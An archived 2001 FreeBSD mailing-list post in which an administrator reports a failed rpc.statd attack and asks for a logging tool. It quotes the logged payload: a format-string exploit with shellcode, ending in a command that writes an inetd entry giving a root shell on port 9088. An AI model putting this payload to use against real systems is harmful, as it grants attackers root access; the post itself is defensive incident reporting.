Skip site navigation (1)Skip section navigation (2) 
Date:      Thu, 4 Jan 2001 09:06:55 -0600
From:      Eric_Stanfield@kenokozie.com
To:        freebsd-questions@freebsd.org
Subject:   hack attempt (again) - help
Message-ID:  <OF4CA83D7A.DC3A3B98-ON862569CA.00526722@kka.com>
next in thread | raw e-mail | index | archive | help 
Alright this jerkoff has once again attempted to hack one of my freebsd=

machines by trying what I assume is a buffer overflow to rpc:

Jan  3 23:19:23 mrtg rpc.statd: Invalid hostname to sm_mon:
^D=F7=FF=BF^D=F7=FF=BF^E=F7=FF=BF^E=F7=FF=BF^F=F7=FF=BF^F=F7=FF=BF^G=F7=
=FF=BF^G=F7=FF=BF%08x %08x %08x %08x %08x %08x %08x
%08x %08x %08x %08x %08x %08x %08x
%0242x%n%055x%n%012x%n%0192x%nM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM=
-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^P=
M-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^PM-^=
PM-^PM-^PM-^PM-^P=EBK^M-

v=ACM-^C=EE M-^M^(M-^C=C6 M-   ^=B0M-^C=EE M-^M^.M-^C=C6 M-^C=C3 M-^C=EB=
#M-  ^=B41=C0M-^C=EE
M-^HF'M-^HF*M-^C=C6 M-^HF=ABM-    F=B8=B0+, M-   =F3M-^MN=ACM-^MV=B8=CD=
M-^@1=DBM-
=D8@=CDM-^@=E8=B0=FF=FF=FF/bin/sh -c echo "9088 stream tcp nowait root =
/bin/sh -i" >>
/tmp/m; /usr/sbin/inetd /tmp/m;

The interesting bit is what he (she?) is attempting to sneak in at the =
end
of the garbage sent to the port.

I've given the system a thorough check and this seems to have been a se=
cond
failed attempt.  I'm now annoyed, however, and would like to be able to=
 at
least log what address this stuff is originating from.   Can anyone sug=
gest
something from the ports that would do the trick?  I've disabled nfs/rp=
c
but I'm sure the hacker will come knocking again.

Thanks.

-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D=
-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-=3D-

Eric Stanfield, K2Access
Keno Kozie and Associates
222 N LaSalle #1500
Chicago, IL 60606
(312) 332-3000

=




To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?OF4CA83D7A.DC3A3B98-ON862569CA.00526722>